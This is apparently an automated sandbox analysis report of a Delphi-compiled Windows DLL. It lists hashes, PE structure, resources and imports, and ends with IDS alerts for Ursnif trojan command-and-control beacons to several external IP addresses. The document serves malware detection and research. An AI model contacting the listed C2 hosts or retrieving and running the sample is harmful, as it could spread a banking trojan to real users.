                        SHA-256:C48C34B58275C8586BA05F0DE058403E5D4BEF7A7489275B5971858A1B1B65DA
                        SHA-512:3B02715FD729AA52FA2738D709F4B09EA244329D1CD8A1FAED420EE2A0A87085BE984ABD38EC3BDF61C2A0D0A5DFCA9640331E596FE7971D8009FF0C5E986BD9
                        Malicious:false
                        Reputation:low
                        Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.2.7.2.<./.P.i.d.>.......
                        Process:C:\Windows\SysWOW64\WerFault.exe
                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):4670
                        Entropy (8bit):4.493943117199789
                        Encrypted:false
                        SSDEEP:48:cvIwSD8zs8JgtWI9A2VWSC8BVs8fm8M4JCdszZFAV+q8/OD0yx4SrS1d:uITf632kSNXRJRUVt0iDW1d
                        MD5:0126F95A901429A83B8D25CA87CD378F
                        SHA1:B291C283CF80A9811F1EA5703267243116199DDD
                        SHA-256:507F8842DAC1704D0AF596840F0F75862C0CEC375118DCBDC55ED85F1D39E175
                        SHA-512:6D3D54EE263306831C43EB89F8246689251F0E293ABB94C3E5F63E658D95274E665B774CEB35CD1BB8A8E74F10FE749C0B5315E26085DC76BFC232DBED680EEC
                        Malicious:false
                        Reputation:low
                        Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1359974" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                        Process:C:\Windows\SysWOW64\WerFault.exe
                        File Type:MS Windows registry file, NT/2000 or above
                        Category:dropped
                        Size (bytes):1572864
                        Entropy (8bit):4.2638646695109035
                        Encrypted:false
                        SSDEEP:12288:MLR2cbZ/FPLJ86W9cwmTJw4qNsIbc65wppMcGFtz3OUkB8lA6LD6y7Rt:sR2cbZ/FPLJ86W9yqYKt
                        MD5:35049590C5CC406E8B91A1B0B5092584
                        SHA1:B8ACCA4CFDD281BC793D177261B5A769CAE049C3
                        SHA-256:B84991E6386C563D75788B986DA5381F88A5EA41408DD98DA31B8E2C4755528A
                        SHA-512:26800F9733BF8608CB4BF2C24592BDA4092458DC12E2B707C5503956015600540CF36114916E5696D997FDB72896332A3014664287BC26840D9D79B40F9CC19A
                        Malicious:false
                        Reputation:low
                        Preview:regfQ...Q...p.\..,.................. ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtm.....................................................................................................................................................................................................................................................................................................................................................e..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\Windows\SysWOW64\WerFault.exe
                        File Type:MS Windows registry file, NT/2000 or above
                        Category:dropped
                        Size (bytes):24576
                        Entropy (8bit):3.8361821028758083
                        Encrypted:false
                        SSDEEP:384:Zwb5uZrdgdXX5gQp8XXLnxOf2oMPmxwp95GjZmGuADTTeW5N5oAR1V:mlcreXXZpigf2ovxwp3WmGuuTeSN51R1
                        MD5:498211172CBFC34A13FD2E9630E30A11
                        SHA1:7413547E9D96756DF22533A3E31E05F5996C75CC
                        SHA-256:6B575ABA2719D1440DCAFECBA4C5FBA11673407180D636A18D597189984D0B21
                        SHA-512:2E58314560305ECCCEFA4377EA207FC5B825E2B55E4F2AA1314355E89E44C2D2AFF62D830A82B8D3731E3650AC473C79E19A5A79C0F6DB0D71132481E69CAC90
                        Malicious:false
                        Reputation:low
                        Preview:regfP...P...p.\..,.................. ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtm.....................................................................................................................................................................................................................................................................................................................................................e..HvLE.^......P...............}JB...l..+|.............................. ..hbin................p.\..,..........nk,..(..........X........................... ...........................&...{ad79c032-a2ea-f756-e377-72fb9332c3ae}......nk ..(.......... ...........P............... .......Z.......................Root........lf......Root....nk ..(.......................}.............. ...............*...............DeviceCensus.......................vk..................WritePermissionsCheck...
                        File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                        Entropy (8bit):6.882756524717819
                        TrID:
                        • Win32 Dynamic Link Library (generic) (1002004/3) 97.97%
                        • Win32 Executable Delphi generic (14689/80) 1.44%
                        • Win16/32 Executable Delphi generic (2074/23) 0.20%
                        • Generic Win/DOS Executable (2004/3) 0.20%
                        • DOS Executable Generic (2002/1) 0.20%
                        File name:hFGZpat9Mf.dll
                        File size:655360
                        MD5:9acde2c3e3a375590a1bc716eabc52c5
                        SHA1:e231c9ae802a9aad9916f08256f7558f531d54ce
                        SHA256:57f997217db22a4d97700768189d44034303e3b15dc08fa48ed6b91bd7051c05
                        SHA512:3c282a6dac4c1a655a6851ef7bcf9d336603614216f93e8bde031697118439081b113bb71473e2939b30225fa684d56d9dbc80bd888cc3312b167c7bef130946
                        SSDEEP:12288:CxdKNJ2yElIM31TVlVPt0+JQjahIx9Q2oleUcUGHS:CwuyElIMlTzBt0Bp3seBU
                        File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
                        Icon Hash:b99988fcd4f66e0f
                        Entrypoint:0x46b448
                        Entrypoint Section:CODE
                        Digitally signed:false
                        Imagebase:0x400000
                        Subsystem:windows gui
                        Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, DLL, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI
                        DLL Characteristics:
                        Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                        TLS Callbacks:
                        CLR (.Net) Version:
                        OS Version Major:4
                        OS Version Minor:0
                        File Version Major:4
                        File Version Minor:0
                        Subsystem Version Major:4
                        Subsystem Version Minor:0
                        Import Hash:7f3476b35f56feee8663a4d549e47d9e
                        Instruction
                        push ebp
                        mov ebp, esp
                        add esp, FFFFFFC4h
                        push ebx
                        mov eax, 0046B028h
                        call 00007F8E18CB1738h
                        push 0046BDF8h
                        call 00007F8E18CB1A8Ah
                        push 0046BDF8h
                        call 00007F8E18CB1A80h
                        push 0046BDF8h
                        call 00007F8E18CB1A76h
                        push 0046BDF8h
                        call 00007F8E18CB1A6Ch
                        push 0046BDF8h
                        call 00007F8E18CB1A62h
                        push 0046BDF8h
                        call 00007F8E18CB1A58h
                        push 0046BDF8h
                        call 00007F8E18CB1A4Eh
                        push 0046BDF8h
                        call 00007F8E18CB1A44h
                        push 0046BDF8h
                        call 00007F8E18CB1A3Ah
                        push 0046BDF8h
                        call 00007F8E18CB1A30h
                        push 0046BDF8h
                        call 00007F8E18CB1A26h
                        push 0046BDF8h
                        call 00007F8E18CB1A1Ch
                        push 0046BDF8h
                        call 00007F8E18CB1A12h
                        push 0046BDF8h
                        call 00007F8E18CB1A08h
                        push 0046BDF8h
                        call 00007F8E18CB19FEh
                        push 0046BDF8h
                        call 00007F8E18CB19F4h
                        push 0046BDF8h
                        call 00007F8E18CB19EAh
                        push 0046BDF8h
                        call 00007F8E18CB19E0h
                        push 0000BDF8h
                        Name | Virtual Address | Virtual Size | Is in Section
                        IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0
                        IMAGE_DIRECTORY_ENTRY_IMPORT | 0x70000 | 0x2172 | .idata
                        IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x7a000 | 0x29600 | .rsrc
                        IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0
                        IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0
                        IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x73000 | 0x6e18 | .reloc
                        IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0
                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0
                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0
                        IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0
                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0
                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0
                        IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0
                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0
                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0
                        IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0
                        Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                        CODE | 0x1000 | 0x6ae04 | 0x6b000 | False | 0.529191917348 | data | 6.56713483483 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                        DATA | 0x6c000 | 0x2324 | 0x2400 | False | 0.465928819444 | data | 4.93971870671 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                        BSS | 0x6f000 | 0xf55 | 0x0 | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                        .idata | 0x70000 | 0x2172 | 0x2200 | False | 0.365349264706 | data | 4.98625501899 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                        .reloc | 0x73000 | 0x6e18 | 0x7000 | False | 0.615618024554 | data | 6.66070715654 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                        .rsrc | 0x7a000 | 0x29600 | 0x29600 | False | 0.458589029456 | data | 6.73870167703 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                        Name | RVA | Size | Type | Language | Country
                        RT_CURSOR | 0x7bd68 | 0x134 | data
                        RT_CURSOR | 0x7be9c | 0x134 | data
                        RT_CURSOR | 0x7bfd0 | 0x134 | data
                        RT_CURSOR | 0x7c104 | 0x134 | data
                        RT_CURSOR | 0x7c238 | 0x134 | data
                        RT_CURSOR | 0x7c36c | 0x134 | data
                        RT_CURSOR | 0x7c4a0 | 0x134 | data
                        RT_BITMAP | 0x7c5d4 | 0x1d0 | data
                        RT_BITMAP | 0x7c7a4 | 0x1e4 | data
                        RT_BITMAP | 0x7c988 | 0x1d0 | data
                        RT_BITMAP | 0x7cb58 | 0x1d0 | data
                        RT_BITMAP | 0x7cd28 | 0x1d0 | data
                        RT_BITMAP | 0x7cef8 | 0x1d0 | data
                        RT_BITMAP | 0x7d0c8 | 0x1d0 | data
                        RT_BITMAP | 0x7d298 | 0x1d0 | data
                        RT_BITMAP | 0x7d468 | 0x1d0 | data
                        RT_BITMAP | 0x7d638 | 0x1d0 | data
                        RT_BITMAP | 0x7d808 | 0xe8 | GLS_BINARY_LSB_FIRST
                        RT_ICON | 0x7d8f0 | 0x2e8 | dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 49, next used block 48059 | English | United States
                        RT_DIALOG | 0x7dbd8 | 0x52 | data
                        RT_STRING | 0x7dc2c | 0x15c | data
                        RT_STRING | 0x7dd88 | 0x3e4 | data
                        RT_STRING | 0x7e16c | 0x340 | data
                        RT_STRING | 0x7e4ac | 0x354 | data
                        RT_STRING | 0x7e800 | 0x230 | data
                        RT_STRING | 0x7ea30 | 0x1d4 | data
                        RT_STRING | 0x7ec04 | 0xec | data
                        RT_STRING | 0x7ecf0 | 0x2fc | data
                        RT_STRING | 0x7efec | 0xd4 | data
                        RT_STRING | 0x7f0c0 | 0x110 | data
                        RT_STRING | 0x7f1d0 | 0x24c | data
                        RT_STRING | 0x7f41c | 0x3f8 | data
                        RT_STRING | 0x7f814 | 0x360 | data
                        RT_STRING | 0x7fb74 | 0x3e8 | data
                        RT_STRING | 0x7ff5c | 0x234 | data
                        RT_STRING | 0x80190 | 0xec | data
                        RT_STRING | 0x8027c | 0x1b4 | data
                        RT_STRING | 0x80430 | 0x3e4 | data
                        RT_STRING | 0x80814 | 0x358 | data
                        RT_STRING | 0x80b6c | 0x2b4 | data
                        RT_RCDATA | 0x80e20 | 0x10 | data
                        RT_RCDATA | 0x80e30 | 0x2fe | MS Windows icon resource - 1 icon, 32x32, 16 colors | Bulgarian | Bulgaria
                        RT_RCDATA | 0x81130 | 0x104 | GIF image data, version 89a, 22 x 22 | Bulgarian | Bulgaria
                        RT_RCDATA | 0x81234 | 0x10b | GIF image data, version 89a, 22 x 22 | Bulgarian | Bulgaria
                        RT_RCDATA | 0x81340 | 0xed | GIF image data, version 89a, 22 x 22 | Bulgarian | Bulgaria
                        RT_RCDATA | 0x81430 | 0xe4 | GIF image data, version 89a, 22 x 22 | Bulgarian | Bulgaria
                        RT_RCDATA | 0x81514 | 0xfe | GIF image data, version 89a, 22 x 22 | Bulgarian | Bulgaria
                        RT_RCDATA | 0x81614 | 0x96 | GIF image data, version 89a, 24 x 24 | Bulgarian | Bulgaria
                        RT_RCDATA | 0x816ac | 0x10c | GIF image data, version 89a, 22 x 22 | Bulgarian | Bulgaria
                        RT_RCDATA | 0x817b8 | 0x105 | GIF image data, version 89a, 22 x 22 | Bulgarian | Bulgaria
                        RT_RCDATA | 0x818c0 | 0x102 | GIF image data, version 89a, 22 x 22 | Bulgarian | Bulgaria
                        RT_RCDATA | 0x819c4 | 0xfb | GIF image data, version 89a, 22 x 22 | Bulgarian | Bulgaria
                        RT_RCDATA | 0x81ac0 | 0x10e | GIF image data, version 89a, 22 x 22 | Bulgarian | Bulgaria
                        RT_RCDATA | 0x81bd0 | 0x105 | GIF image data, version 89a, 22 x 22 | Bulgarian | Bulgaria
                        RT_RCDATA | 0x81cd8 | 0x100 | GIF image data, version 89a, 22 x 22 | Bulgarian | Bulgaria
                        RT_RCDATA | 0x81dd8 | 0xfc | GIF image data, version 89a, 22 x 22 | Bulgarian | Bulgaria
                        RT_RCDATA | 0x81ed4 | 0x113 | GIF image data, version 89a, 22 x 22 | Bulgarian | Bulgaria
                        RT_RCDATA | 0x81fe8 | 0x10e | GIF image data, version 89a, 22 x 22 | Bulgarian | Bulgaria
                        RT_RCDATA | 0x820f8 | 0x106 | GIF image data, version 89a, 22 x 22 | Bulgarian | Bulgaria
                        RT_RCDATA | 0x82200 | 0xfd | GIF image data, version 89a, 22 x 22 | Bulgarian | Bulgaria
                        RT_RCDATA | 0x82300 | 0x115 | GIF image data, version 89a, 22 x 22 | Bulgarian | Bulgaria
                        RT_RCDATA | 0x82418 | 0x113 | GIF image data, version 89a, 22 x 22 | Bulgarian | Bulgaria
                        RT_RCDATA | 0x8252c | 0x229 | HTML document, ASCII text, with CRLF, CR line terminators | Bulgarian | Bulgaria
                        RT_RCDATA | 0x82758 | 0x3f | GIF image data, version 89a, 12 x 16 | Bulgarian | Bulgaria
                        RT_RCDATA | 0x82798 | 0x6e | GIF image data, version 89a, 16 x 16 | Bulgarian | Bulgaria
                        RT_RCDATA | 0x82808 | 0x50 | GIF image data, version 89a, 16 x 16 | Bulgarian | Bulgaria
                        RT_RCDATA | 0x82858 | 0x6c | GIF image data, version 89a, 16 x 16 | Bulgarian | Bulgaria
                        RT_RCDATA | 0x828c4 | 0x4f | GIF image data, version 89a, 16 x 16 | Bulgarian | Bulgaria
                        RT_RCDATA | 0x82914 | 0x6f | GIF image data, version 89a, 17 x 16 | Bulgarian | Bulgaria
                        RT_RCDATA | 0x82984 | 0x41 | GIF image data, version 89a, 15 x 15 | Bulgarian | Bulgaria
                        RT_RCDATA | 0x829c8 | 0x3c | GIF image data, version 89a, 16 x 12 | Bulgarian | Bulgaria
                        RT_RCDATA | 0x82a04 | 0x69 | GIF image data, version 89a, 16 x 16 | Bulgarian | Bulgaria
                        RT_RCDATA | 0x82a70 | 0x4d | GIF image data, version 89a, 16 x 16 | Bulgarian | Bulgaria
                        RT_RCDATA | 0x82ac0 | 0x71 | GIF image data, version 89a, 16 x 17 | Bulgarian | Bulgaria
                        RT_RCDATA | 0x82b34 | 0x69 | GIF image data, version 89a, 16 x 16 | Bulgarian | Bulgaria
                        RT_RCDATA | 0x82ba0 | 0x4d | GIF image data, version 89a, 16 x 16 | Bulgarian | Bulgaria
                        RT_RCDATA | 0x82bf0 | 0x12c | GIF image data, version 89a, 10 x 12 | Bulgarian | Bulgaria
                        RT_RCDATA | 0x82d1c | 0x129 | GIF image data, version 89a, 10 x 12 | Bulgarian | Bulgaria
                        RT_RCDATA | 0x82e48 | 0x91 | GIF image data, version 89a, 16 x 16 | Bulgarian | Bulgaria
                        RT_RCDATA | 0x82edc | 0x82 | GIF image data, version 89a, 16 x 16 | Bulgarian | Bulgaria
                        RT_RCDATA | 0x82f60 | 0x75 | GIF image data, version 89a, 16 x 16 | Bulgarian | Bulgaria
                        RT_RCDATA | 0x82fd8 | 0x9e | GIF image data, version 89a, 16 x 16 | Bulgarian | Bulgaria
                        RT_RCDATA | 0x83078 | 0x7c | GIF image data, version 89a, 16 x 16 | Bulgarian | Bulgaria
                        RT_RCDATA | 0x830f4 | 0x36 | GIF image data, version 89a, 1 x 1 | Bulgarian | Bulgaria
                        RT_RCDATA | 0x8312c | 0xea6 | HTML document, ASCII text, with CRLF line terminators | Bulgarian | Bulgaria
                        RT_RCDATA | 0x83fd4 | 0x2b9f | ASCII text, with CRLF line terminators | Bulgarian | Bulgaria
                        RT_RCDATA | 0x86b74 | 0x4e98 | ASCII text, with CRLF line terminators | Bulgarian | Bulgaria
                        RT_RCDATA | 0x8ba0c | 0x539 | ASCII text, with CRLF line terminators | Bulgarian | Bulgaria
                        RT_RCDATA | 0x8bf48 | 0x1d08 | HTML document, ASCII text, with CRLF line terminators | Bulgarian | Bulgaria
                        RT_RCDATA | 0x8dc50 | 0x61b | ASCII text, with CRLF line terminators | Bulgarian | Bulgaria
                        RT_RCDATA | 0x8e26c | 0x671 | ASCII text, with CRLF line terminators | Bulgarian | Bulgaria
                        RT_RCDATA | 0x8e8e0 | 0x7e61 | ASCII text, with CRLF line terminators | Bulgarian | Bulgaria
                        RT_RCDATA | 0x96744 | 0xd59 | HTML document, ASCII text, with CRLF line terminators | Bulgarian | Bulgaria
                        RT_RCDATA | 0x974a0 | 0x664 | data
                        RT_RCDATA | 0x97b04 | 0x1c9 | Delphi compiled form 'Tgj3eo9f8hwe89fq'
                        RT_RCDATA | 0x97cd0 | 0xb804 | data | English | United States
                        RT_GROUP_CURSOR | 0xa34d4 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1
                        RT_GROUP_CURSOR | 0xa34e8 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1
                        RT_GROUP_CURSOR | 0xa34fc | 0x14 | Lotus unknown worksheet or configuration, revision 0x1
                        RT_GROUP_CURSOR | 0xa3510 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1
                        RT_GROUP_CURSOR | 0xa3524 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1
                        RT_GROUP_CURSOR | 0xa3538 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1
                        RT_GROUP_CURSOR | 0xa354c | 0x14 | Lotus unknown worksheet or configuration, revision 0x1
                        RT_GROUP_ICON | 0xa3560 | 0x14 | data | English | United States
                        DLL | Import
                        kernel32.dll | DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, VirtualFree, VirtualAlloc, LocalFree, LocalAlloc, GetVersion, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, WriteFile, UnhandledExceptionFilter, RtlUnwind, RaiseException, GetStdHandle
                        user32.dll | GetKeyboardType, LoadStringA, MessageBoxA, CharNextA
                        advapi32.dll | RegQueryValueExA, RegOpenKeyExA, RegCloseKey
                        oleaut32.dll | SysFreeString, SysReAllocStringLen, SysAllocStringLen
                        kernel32.dll | TlsSetValue, TlsGetValue, TlsFree, TlsAlloc, LocalFree, LocalAlloc
                        advapi32.dll | RegQueryValueExA, RegOpenKeyExA, RegCloseKey
                        kernel32.dll | lstrcpyA, WriteFile, WaitForSingleObject, VirtualQuery, VirtualAlloc, Sleep, SizeofResource, SetThreadLocale, SetFilePointer, SetEvent, SetErrorMode, SetEndOfFile, ResetEvent, ReadFile, MultiByteToWideChar, MulDiv, LockResource, LoadResource, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GlobalUnlock, GlobalReAlloc, GlobalHandle, GlobalLock, GlobalFree, GlobalFindAtomA, GlobalDeleteAtom, GlobalAlloc, GlobalAddAtomA, GetVersionExA, GetVersion, GetTickCount, GetThreadLocale, GetTempPathA, GetSystemInfo, GetSystemDirectoryA, GetStringTypeExA, GetStdHandle, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLocalTime, GetLastError, GetFullPathNameA, GetFileSize, GetDiskFreeSpaceA, GetDateFormatA, GetCurrentThreadId, GetCurrentProcessId, GetCPInfo, GetACP, FreeResource, InterlockedExchange, FreeLibrary, FormatMessageA, FindResourceA, EnumCalendarInfoA, EnterCriticalSection, DeleteCriticalSection, CreateThread, CreateFileA, CreateEventA, CompareStringA, CloseHandle
                        version.dll | VerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA
                        gdi32.dll | UnrealizeObject, StrokePath, StretchBlt, SetWindowOrgEx, SetWinMetaFileBits, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetEnhMetaFileBits, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SaveDC, RestoreDC, RectVisible, RealizePalette, PlayEnhMetaFile, PatBlt, MoveToEx, MaskBlt, LineTo, IntersectClipRect, GetWindowOrgEx, GetWinMetaFileBits, GetTextMetricsA, GetTextExtentPoint32A, GetSystemPaletteEntries, GetStockObject, GetPixel, GetPaletteEntries, GetObjectA, GetEnhMetaFilePaletteEntries, GetEnhMetaFileHeader, GetEnhMetaFileBits, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, GdiFlush, ExcludeClipRect, DeleteObject, DeleteEnhMetaFile, DeleteDC, CreateSolidBrush, CreatePenIndirect, CreatePalette, CreateHalftonePalette, CreateFontIndirectA, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, CopyEnhMetaFileA, BitBlt
                        user32.dll | CreateWindowExA, WindowFromPoint, WinHelpA, WaitMessage, UpdateWindow, UnregisterClassA, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoA, ShowWindow, ShowScrollBar, ShowOwnedPopups, ShowCursor, SetWindowsHookExA, SetWindowPos, SetWindowPlacement, SetWindowLongA, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetParent, SetMenuItemInfoA, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClassLongA, SetCapture, SetActiveWindow, SendMessageA, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, RedrawWindow, PtInRect, PostQuitMessage, PostMessageA, PeekMessageA, OffsetRect, OemToCharA, MessageBoxA, MapWindowPoints, MapVirtualKeyA, LoadStringA, LoadKeyboardLayoutA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageA, IsChild, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, GetWindowThreadProcessId, GetWindowTextA, GetWindowRect, GetWindowPlacement, GetWindowLongA, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropA, GetParent, GetWindow, GetMenuStringA, GetMenuState, GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClipboardData, GetClientRect, GetClassNameA, GetClassInfoA, GetCapture, GetActiveWindow, FrameRect, FindWindowA, FillRect, EqualRect, EnumWindows, EnumThreadWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, DrawTextA, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawEdge, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreatePopupMenu, CreateMenu, CreateIcon, ClientToScreen, CheckMenuItem, CallWindowProcA, CallNextHookEx, BeginPaint, CharNextA, CharLowerBuffA, CharLowerA, CharToOemA, AdjustWindowRectEx, ActivateKeyboardLayout
                        kernel32.dll | Sleep
                        oleaut32.dll | SafeArrayPtrOfIndex, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopy, VariantClear, VariantInit
                        ole32.dll | CoUninitialize, CoInitialize
                        oleaut32.dll | GetErrorInfo, SysFreeString
                        comctl32.dll | ImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_GetDragImage, ImageList_DragShowNolock, ImageList_SetDragCursorImage, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_ReplaceIcon, ImageList_Add, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create
                        Language of compilation system | Country where language is spoken | Map
                        English | United States
                        Bulgarian | Bulgaria
                        Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                        01/26/22-17:03:29.526106 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49753 | 80 | 192.168.2.5 | 13.107.42.16
                        01/26/22-17:03:50.217694 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49758 | 80 | 192.168.2.5 | 194.76.226.200
                        01/26/22-17:04:11.131587 | TCP | 2033204 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) | 49771 | 80 | 192.168.2.5 | 211.119.84.112
                        01/26/22-17:04:11.131587 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49771 | 80 | 192.168.2.5 | 211.119.84.112
                        01/26/22-17:04:32.817920 | TCP | 2033204 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) | 49781 | 80 | 192.168.2.5 | 41.41.255.235
                        01/26/22-17:04:53.808751 | TCP | 2033204 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) | 49812 | 80 | 192.168.2.5 | 31.214.157.187
